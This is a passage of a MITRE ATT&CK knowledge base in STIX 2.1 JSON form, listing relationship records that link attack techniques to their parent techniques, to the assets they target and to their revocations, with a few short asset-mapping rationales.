"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6d8b1f40-48a0-484b-8eea-48195a8bfff2", "created": "2020-02-21T20:32:21.128Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6db133fd-2beb-4c5e-a97c-3d3ef03bee50", "created": "2020-02-11T18:58:46.015Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e5f5721-411f-4012-8f52-26e24f6782ea", "created": "2023-09-08T15:39:53.135Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-08T15:39:53.135Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e743193-6a74-422a-bdea-c0d4abbf9ad9", "created": "2020-01-19T16:54:28.884Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6eafa3e9-f53f-43b5-ac24-1415b05b537f", "created": "2024-03-26T15:42:22.024Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-26T15:42:22.024Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f1479d9-dfd4-4baa-abd5-9847781ef9bf", "created": "2023-09-29T17:41:50.116Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:41:50.116Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f2ddada-d7df-4788-b5d1-9add185142e0", "created": "2023-09-28T20:02:57.330Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:02:57.330Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f72c60e-2739-40b6-b6a9-66d2a3d1833e", "created": "2023-09-28T21:27:14.172Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:27:14.172Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f75a833-d53e-41bb-942b-cef4f3f076c3", "created": "2022-04-20T21:06:07.562Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "description": "", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "target_ref": "attack-pattern--7d20fff9-8751-404e-badd-ccd71bda0236", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f7a4f3f-44ee-491f-be50-caa928214111", "created": "2021-10-15T20:15:41.488Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b22e5153-ac28-4cc6-865c-2054e36285cb", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6f950c91-125b-46a0-aa40-239b4de2306a", "created": "2023-09-28T21:14:03.305Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:14:03.305Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--70199b6c-99f7-4800-854d-7128f90fd13e", "created": "2024-05-30T15:43:40.698Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-30T15:43:40.698Z", "description": "Asset Mapping Rationale: ", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7083356e-b0a6-4fff-ac50-6d0ea2a841bc", "created": "2020-01-31T18:58:17.423Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3", "target_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7097c7b2-9266-4659-955b-38214d5ada8c", "created": "2023-02-21T19:38:13.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-02-21T19:38:13.470Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7139ac4a-7ece-47da-a5e5-0da99847d6fa", "created": "2023-03-14T17:36:01.095Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-03-14T17:36:01.095Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71856525-a57e-4d17-9057-fdf998773016", "created": "2022-09-30T21:14:12.377Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-09-30T21:14:12.377Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e5d550f3-2202-4634-85f2-4a200a1d49b3", "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--718fad77-0006-461a-9a46-337defcf44ac", "created": "2020-01-22T15:05:05.777Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71a2c3f5-7383-4bd8-a830-dc2aae62a977", "created": "2023-09-28T19:55:37.459Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:55:37.459Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71aca8ff-1ac7-4d62-b388-ef4605cf8d4b", "created": "2022-04-22T18:49:20.528Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-04-25T14:00:00.188Z", "description": "", "relationship_type": "revoked-by", "source_ref": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--723b4534-34cc-4b65-9547-f461cb744586", "created": "2020-03-15T00:40:27.649Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72855f59-9302-4568-b5c9-c5aa7d233815", "created": "2024-05-23T04:16:16.135Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:34:00.312Z", "description": "Asset Mapping Rationale: Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as erase", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73093c08-ea39-4956-8bff-55e15f6630cd", "created": "2023-09-28T20:07:59.785Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:07:59.785Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--731fb0bf-242f-43d3-906e-cb5d9781eb7f", "created": "2020-02-04T19:17:42.280Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "target_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73672e43-5a42-4b6a-934b-a52f57bdd7ac", "created": "2020-02-10T20:43:10.411Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73c358d5-f4ce-4ce5-aa3d-d2ede8aff148", "created": "2024-03-25T20:17:16.271Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-25T20:17:16.271Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73cdbba5-d2f0-49a4-84fb-b031fda36655", "created": "2020-01-10T18:01:03.848Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--740082b7-2411-473a-a59d-4d46cf12f8b5", "created": "2023-09-29T18:45:01.516Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:45:01.516Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74192d82-680f-412e-80df-27b86fdfa20c", "created": "2020-10-20T00:09:33.144Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--818302b2-d640-477b-bf88-873120ce85c4", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--745b5268-f2b3-499c-a6a4-63d7e8667ff7", "created": "2023-09-29T17:57:23.090Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:57:23.090Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--74855658-e1e3-4781-a2bc-a685cf1a77d1", "created": "2024-05-23T03:47:05.649Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:37:01.799Z", "description": "Asset Mapping Rationale: Detection - Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows.", "relationship_type": "targets", "source_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--757be841-a218-4d0e-bbe3-a138eea7692e", "created": "2020-10-01T02:08:34.018Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7584e57f-1258-4c47-b18d-99019a586e6c", "created": "2023-09-28T21:16:35.382Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:16:35.382Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--758773e3-d23d-44db-b5d3-643cde5b41f1", "created": "2023-09-28T19:45:07.511Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:45:07.511Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75c27f4e-d1e3-490a-9793-a6fc8e326a48", "created": "2023-09-29T17:06:33.098Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:06:33.098Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75e6adae-06a7-47e9-878e-74ca73004c3b", "created": "2023-09-28T20:30:01.641Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:30:01.641Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--761c328c-c7fe-4968-875d-537b99c4a605", "created": "2020-06-16T17:23:06.601Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4", "target_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76537fd7-5782-4a8d-9b54-117b168a4306", "created": "2023-09-29T16:38:51.155Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:38:51.155Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--769b2668-2e16-4300-89f4-f45124896fb8", "created": "2020-03-27T21:02:29.469Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76d837ed-157b-44e0-a6bf-189ffc3239c3", "created": "2020-03-15T15:37:47.740Z", "created_by_ref": 